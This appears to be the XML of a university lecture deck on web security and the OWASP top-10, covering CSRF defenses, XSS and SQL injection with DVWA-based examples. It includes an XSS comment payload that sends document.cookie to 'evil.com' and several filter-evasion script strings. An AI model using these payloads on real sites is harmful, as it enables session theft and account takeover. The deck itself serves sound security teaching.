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89" r:id="rId2"/>
    <p:sldId id="657" r:id="rId3"/>
    <p:sldId id="481" r:id="rId4"/>
    <p:sldId id="494" r:id="rId5"/>
    <p:sldId id="495" r:id="rId6"/>
    <p:sldId id="532" r:id="rId7"/>
    <p:sldId id="558" r:id="rId8"/>
    <p:sldId id="496" r:id="rId9"/>
    <p:sldId id="473" r:id="rId10"/>
    <p:sldId id="497" r:id="rId11"/>
    <p:sldId id="559" r:id="rId12"/>
    <p:sldId id="472" r:id="rId13"/>
    <p:sldId id="503" r:id="rId14"/>
    <p:sldId id="499" r:id="rId15"/>
    <p:sldId id="560" r:id="rId16"/>
    <p:sldId id="562" r:id="rId17"/>
    <p:sldId id="561" r:id="rId18"/>
    <p:sldId id="608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637" r:id="rId47"/>
    <p:sldId id="638" r:id="rId48"/>
    <p:sldId id="639" r:id="rId49"/>
    <p:sldId id="640" r:id="rId50"/>
    <p:sldId id="641" r:id="rId51"/>
    <p:sldId id="642" r:id="rId52"/>
    <p:sldId id="643" r:id="rId53"/>
    <p:sldId id="644" r:id="rId54"/>
    <p:sldId id="645" r:id="rId55"/>
    <p:sldId id="646" r:id="rId56"/>
    <p:sldId id="647" r:id="rId57"/>
    <p:sldId id="648" r:id="rId58"/>
    <p:sldId id="649" r:id="rId59"/>
    <p:sldId id="650" r:id="rId60"/>
    <p:sldId id="651" r:id="rId61"/>
    <p:sldId id="652" r:id="rId62"/>
    <p:sldId id="653" r:id="rId63"/>
    <p:sldId id="654" r:id="rId64"/>
    <p:sldId id="655" r:id="rId65"/>
    <p:sldId id="65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657"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="injection" id="{04222959-40F8-2A4F-B0F4-0100C1BB1A5E}">
          <p14:sldIdLst/>
        </p14:section>
        <p14:section name="XSS" id="{0A3C25CD-A08A-3E49-BC32-AF4EB0DB42B2}">
          <p14:sldIdLst>
            <p14:sldId id="481"/>
            <p14:sldId id="494"/>
            <p14:sldId id="495"/>
            <p14:sldId id="532"/>
            <p14:sldId id="558"/>
            <p14:sldId id="496"/>
            <p14:sldId id="473"/>
            <p14:sldId id="497"/>
            <p14:sldId id="559"/>
            <p14:sldId id="472"/>
            <p14:sldId id="503"/>
            <p14:sldId id="499"/>
            <p14:sldId id="560"/>
            <p14:sldId id="562"/>
            <p14:sldId id="561"/>
            <p14:sldId id="608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</p14:sldIdLst>
        </p14:section>
        <p14:section name="Day 2" id="{E8C24AD2-3F96-4613-B3D5-F801425FB0A1}">
          <p14:sldIdLst/>
        </p14:section>
        <p14:section name="CSRF" id="{67664588-4A76-E242-B1AD-2DCB40B40068}">
          <p14:sldIdLst/>
        </p14:section>
        <p14:section name="Web Frameworks" id="{214269CC-6264-4B5D-B674-34132B35CA4E}">
          <p14:sldIdLst/>
        </p14:section>
        <p14:section name="Malicious Servers" id="{609BDB3A-BCDF-4961-A367-D048EFD5209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717BFF"/>
    <a:srgbClr val="3F5842"/>
    <a:srgbClr val="595A5A"/>
    <a:srgbClr val="A32D1E"/>
    <a:srgbClr val="FFFFFF"/>
    <a:srgbClr val="866C49"/>
    <a:srgbClr val="79463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3" autoAdjust="0"/>
    <p:restoredTop sz="86098" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="56" d="100"/>
          <a:sy n="56" d="100"/>
        </p:scale>
        <p:origin x="485" y="36"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2880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9" d="100"/>
        <a:sy n="59" d="100"/>
      </p:scale>
      <p:origin x="0" y="-40027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8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3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widely used techniques for defending against</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF attacks: validating a secret request token, validating</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header, and validating custom headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attached to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLHttpRequests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. None of these techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>are satisfactory, for a variety of reasons.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1. The most popular CSRF defense is to include a secret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>token with each request and to validate that the received</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>token is correctly bound to the user’s session,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>preventing CSRF by forcing the attacker to guess the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>session’s token. There are a number of variations on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>this approach, each fraught with pitfalls, and even sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that implement the technique correctly often overlook</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>their login requests because login request lack a session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to which to bind the token.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2. The simplest CSRF defense is to validate the HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header, preventing CSRF by accepting requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>only from trusted sources. While effective in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>principle, this technique must deal with requests that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>lack a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header entirely. Sites can either process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>these requests or block them. If a site processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>requests that lack a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header, the defense is ineffective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>because the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header can be suppressed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>by an attacker. If the site refuses to process these requests,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>our experimental measurements indicate that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the site will exclude an appreciable fraction of users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLHttpRequest’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> popularity has increased recently</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with more sites implementing AJAX interfaces. Sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can defend against CSRF by setting a custom header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and validating that the header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is present before processing state-modifying requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Although effective, this defense requires sites to make</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>all state-modifying requests via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>requirement that prevents many natural site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31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1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6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5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implement the technique correctly often overlook</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>their login requests because login request lack a session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to which to bind the token.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2. The simplest CSRF defense is to validate the HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header, preventing CSRF by accepting requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>only from trusted sources. While effective in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>principle, this technique must deal with requests that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>lack a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header entirely. Sites can either process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>these requests or block them. If a site processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>requests that lack a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header, the defense is ineffective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>because the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header can be suppressed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>by an attacker. If the site refuses to process these requests,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>our experimental measurements indicate that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the site will exclude an appreciable fraction of users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLHttpRequest’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> popularity has increased recently</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with more sites implementing AJAX interfaces. Sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can defend against CSRF by setting a custom header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and validating that the header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is present before processing state-modifying requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Although effective, this defense requires sites to make</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>all state-modifying requests via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>requirement that prevents many natural site designs.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0BC87F4-D49F-E642-9754-EAF96EFFFD59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48D025A-40F7-CC4A-AD71-A8F5DC84BB91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7137D59-5BCA-8C4D-8DD0-A63B1F441858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CE9BA8E-2C8B-BE48-92FF-52627D1A32EA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D001519-4859-A94D-B4B1-722C66DE7697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B36B7-D3A9-C84E-9580-EE5B9D2B6BB1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8E2B626-39B8-7546-A980-9A88ED8D4782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F544-E274-214A-B114-86E988325E96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4F52F46-590B-C047-9A60-F715E59A8161}" type="datetime1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1516809-88E5-4C48-A4E9-E818AEF70AF2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B62AE86-26B4-E440-9756-88F6B5A3255E}" type="datetime1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DF96585-23D7-6E4D-9D00-EB2A91A8B291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69816070-F86F-DA4E-859F-9164FF476374}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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5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.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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98423" y="203517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Web Security and OWASP top-10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083" y="5380672"/>
            <a:ext cx="6731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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>David </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Brumley</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Carnegie Mellon University)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples based on DVWA (http://www.dvwa.co.uk/)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Collin Jackson’s Web Security Course</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> http://caffeinept.blogspot.com/2012/01/dvwa-sql-injection.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Graphics from The Noun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7-03 at 12.2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511300"/>
            <a:ext cx="6070600" cy="383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708213"/>
            <a:ext cx="4560047" cy="936815"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -18231"/>
              <a:gd name="adj2" fmla="val 12223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Fill in with &lt;script&gt;alert(“test”);&lt;script&gt;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43000" y="5594789"/>
            <a:ext cx="6858000" cy="1185556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Every browser that visits the page will run the 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45" y="3842476"/>
            <a:ext cx="3614860" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrowCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 28369"/>
              <a:gd name="adj2" fmla="val 33421"/>
              <a:gd name="adj3" fmla="val 46895"/>
              <a:gd name="adj4" fmla="val 827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Posts comment with text:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> = “evil.com/” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>&lt;/script&gt;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3" y="4388489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14" y="2183304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346" y="1503618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5046" y="2237358"/>
            <a:ext cx="1102102" cy="1102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41" y="2213328"/>
            <a:ext cx="1905372" cy="11090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613" y="224713"/>
            <a:ext cx="1240078" cy="17857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70648" y="487104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lapdonline.org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8691" y="77200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68543" y="22471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70648" y="5318254"/>
            <a:ext cx="1102102" cy="110210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17906" y="1642610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evil.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f9geiv33knv141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81987" y="499037"/>
            <a:ext cx="2056427" cy="715089"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -23541"/>
              <a:gd name="adj2" fmla="val 10622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Session token for lapdonline.org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55524" y="3310567"/>
            <a:ext cx="683089" cy="1024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24400" y="3434364"/>
            <a:ext cx="286279" cy="7312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9338" y="3547841"/>
            <a:ext cx="3556699" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrowCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 19760"/>
              <a:gd name="adj2" fmla="val 25000"/>
              <a:gd name="adj3" fmla="val 28930"/>
              <a:gd name="adj4" fmla="val 875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Comment with text:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> = “evil.com/” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>&lt;/script&gt;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44311" y="3434364"/>
            <a:ext cx="287274" cy="8061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070648" y="1633056"/>
            <a:ext cx="551051" cy="729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5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47440" y="1975597"/>
            <a:ext cx="1841002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06998" y="1975597"/>
            <a:ext cx="1841002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Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Elbow Connector 7"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="0"/>
            <a:endCxn id="6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4497720" y="-394624"/>
            <a:ext cx="12700" cy="474044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7479" y="128979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Send XSS attack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5998" y="2585197"/>
            <a:ext cx="8432002" cy="2296068"/>
            <a:chOff x="355998" y="2585197"/>
            <a:chExt cx="8432002" cy="2296068"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rounded Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="355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52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49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Victim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46998" y="3505200"/>
              <a:ext cx="1841002" cy="6096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Victim</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="6" idx="2"/>
              <a:endCxn id="13" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1276499" y="2585197"/>
              <a:ext cx="5591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14" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3473499" y="2585197"/>
              <a:ext cx="3394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15" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5670499" y="2585197"/>
              <a:ext cx="1197442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16" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6867941" y="2585197"/>
              <a:ext cx="999558" cy="9200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91606" y="4419600"/>
              <a:ext cx="5160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Victim exploited just by visiting site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38002" y="2302614"/>
            <a:ext cx="797302" cy="7973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2856" y="2381295"/>
            <a:ext cx="661102" cy="6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429000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Main problem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>unsanitized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>input is evaluated by the server or another user’s browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Main solution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: sanitize input to remove “code” from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5105400"/>
            <a:ext cx="7981950" cy="914400"/>
            <a:chOff x="609600" y="5105400"/>
            <a:chExt cx="798195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5105400"/>
              <a:ext cx="3581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Don’t roll your own crypto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0150" y="5105400"/>
              <a:ext cx="3581400" cy="914400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Don’t write your own sanitization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286250" y="5370786"/>
              <a:ext cx="666750" cy="383627"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 38177"/>
                <a:gd name="adj2" fmla="val 50000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3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Sanitizing Is Not Easy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1"/>
            <a:ext cx="3810000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Remove cases of “&lt;script&gt;”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221" y="2124754"/>
            <a:ext cx="603101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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ipt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ipt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;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829331"/>
            <a:ext cx="4572000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Recursively Remove cases of “&lt;script&gt;”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8698" y="3546082"/>
            <a:ext cx="4285533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=“alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)”&gt;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83476" y="4278598"/>
            <a:ext cx="6984124" cy="4571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Recursively Remove cases of “&lt;script&gt;” and JS keywords like “alert”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54516" y="5099292"/>
            <a:ext cx="4033900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¼script¾a\u006ert(¢XSS¢)¼/script¾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42092" y="5791199"/>
            <a:ext cx="8059816" cy="976797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/>
              <a:t>US-ASCII 7-bit encoding. Server specific (Apache tomcat did this).</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(1/4 = single character in ISO 8859-1, IE strips off MSB, get 60, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>which is ‘&lt;‘ in 7-bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ascii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“Frontier Sanitization”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321014"/>
            <a:ext cx="1240078" cy="1785712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5344439" y="2540152"/>
            <a:ext cx="3810000" cy="3657600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29303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81" y="3060754"/>
            <a:ext cx="1905372" cy="1109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88655"/>
            <a:ext cx="1905372" cy="11090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124200" y="1883851"/>
            <a:ext cx="3352800" cy="173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3153" y="3657600"/>
            <a:ext cx="3357647" cy="556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4834503"/>
            <a:ext cx="3276600" cy="808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1504116"/>
            <a:ext cx="364329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Sanitize all input immediately</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(SQL, XSS, bash, etc.)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90600" y="2743200"/>
            <a:ext cx="7315200" cy="1447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order should the sanitization routines be applied? SQL then XSS, XSS then SQL?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35999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SQL Injection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61" y="2371281"/>
            <a:ext cx="1240078" cy="178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28" y="2323658"/>
            <a:ext cx="1339472" cy="1852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62" y="2735863"/>
            <a:ext cx="1905372" cy="1109097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3016775" y="1905000"/>
            <a:ext cx="2863618" cy="2971800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3290412"/>
            <a:ext cx="15240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80" y="21909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3984" y="2921079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4200" y="2894804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evil\'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56042" y="148339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Sanitizer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44439" y="1600200"/>
            <a:ext cx="3723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into sessions (username, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>sessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>) values (‘evil\’’, 1234)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2306700"/>
            <a:ext cx="1665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* from sessions where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
